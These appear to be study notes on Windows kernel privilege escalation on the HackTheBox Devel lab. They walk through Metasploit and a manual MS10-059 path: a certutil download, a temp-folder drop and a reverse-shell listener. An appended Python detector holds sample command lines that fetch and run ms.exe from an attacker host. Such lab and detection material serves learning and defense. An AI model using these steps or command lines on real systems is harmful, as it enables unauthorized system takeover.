## Overview
![[image.BPHLW1.png]]
![[image.O2EHW1.png]]
- We need the "systeminfo" output because kernel exploits are specific to the Windows build.

- If we own the Kernel, we own the system - that's what we are trying to do.
## Escalation with Metasploit (Example - Devel HTB)
1. Background the meterpreter session

![[image.BPVLW1.png]]
2. Search and use the exploit you found by priv suggester
![[image.GMWMW1.png]]
3. Set the appropriate meterpreter session (and the other options)
![[image.T59QW1.png]]
4. Run and get another meterpreter session!
![[image.ILWHW1.png]]
5. Be root
![[image.1GM9V1.png]]
## Manual Kernel Exploitation (Devel - HTB)
1. Search for the specific kernel exploit in Google
- ms10-015 doesn't work because we don't have GUI access
- so keep working through them & researching each one
- The rest of the example uses MS10-059 (the Chimichurri exploit)

2. Download the .exe to the attacking machine

![[image.59C9V1.png]]
3. Set up a Python HTTP server on the attacking machine to host the file for the victim to download

4. Go to the temp folder (we likely have write access there)

![[image.ZQL8V1.png]]
5. Download the file with the certutil command (similar to wget on Linux)

![[image.MLLGW1.png]]
6. Run the exploit with the proper syntax (ms.exe <attacker_IP> <attacker_port>)

![[image.PR0HW1.png]]
7. On the attacking machine, open another shell listening on the correct port

![[image.EEODW1.png]]
8. Become root!
![[image.TYR6V1.png]]
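A defender-side check for the manual procedure above, added here as an example (it is not part of the original notes): it scans constructed process-creation events for certutil being used as a downloader and for a binary launched from a temp directory, the two traces a dropped kernel exploit leaves behind. The events, paths, IP and port are all made up for the example.

```python
import re
from typing import Dict, Iterable, List, Tuple

# Constructed sample process-creation events (image path + command line); not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -urlcache -f http://10.10.14.5:8000/ms.exe C:\Windows\Temp\ms.exe"},
    {"image": r"C:\Windows\Temp\ms.exe",
     "cmd": r"C:\Windows\Temp\ms.exe 10.10.14.5 4444"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -verify C:\certs\site.cer"},          # legitimate certutil use
    {"image": r"C:\Program Files\App\app.exe",
     "cmd": r'"C:\Program Files\App\app.exe" --update'},     # benign, normal install path
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Common temp locations an attacker writes to because they are world-writable.
TEMP_DIR_RE = re.compile(r"\\(?:Windows\\Temp|Temp|AppData\\Local\\Temp)\\", re.IGNORECASE)


def is_certutil_download(image: str, cmd: str) -> bool:
    """certutil abused as a downloader: -urlcache together with a URL on the command line."""
    if image.lower().rsplit("\\", 1)[-1] != "certutil.exe":
        return False
    return "-urlcache" in cmd.lower() and URL_RE.search(cmd) is not None


def is_temp_dir_exec(image: str) -> bool:
    """Executable launched from a temp directory (where the dropped exploit landed)."""
    return TEMP_DIR_RE.search(image) is not None


def analyze(events: Iterable[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule_name, command_line) for every event that matches a rule."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        image, cmd = ev["image"], ev["cmd"]
        if is_certutil_download(image, cmd):
            findings.append(("certutil_download", cmd))
        if is_temp_dir_exec(image):
            findings.append(("temp_dir_execution", cmd))
    return findings


if __name__ == "__main__":
    for rule, cmd in analyze(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```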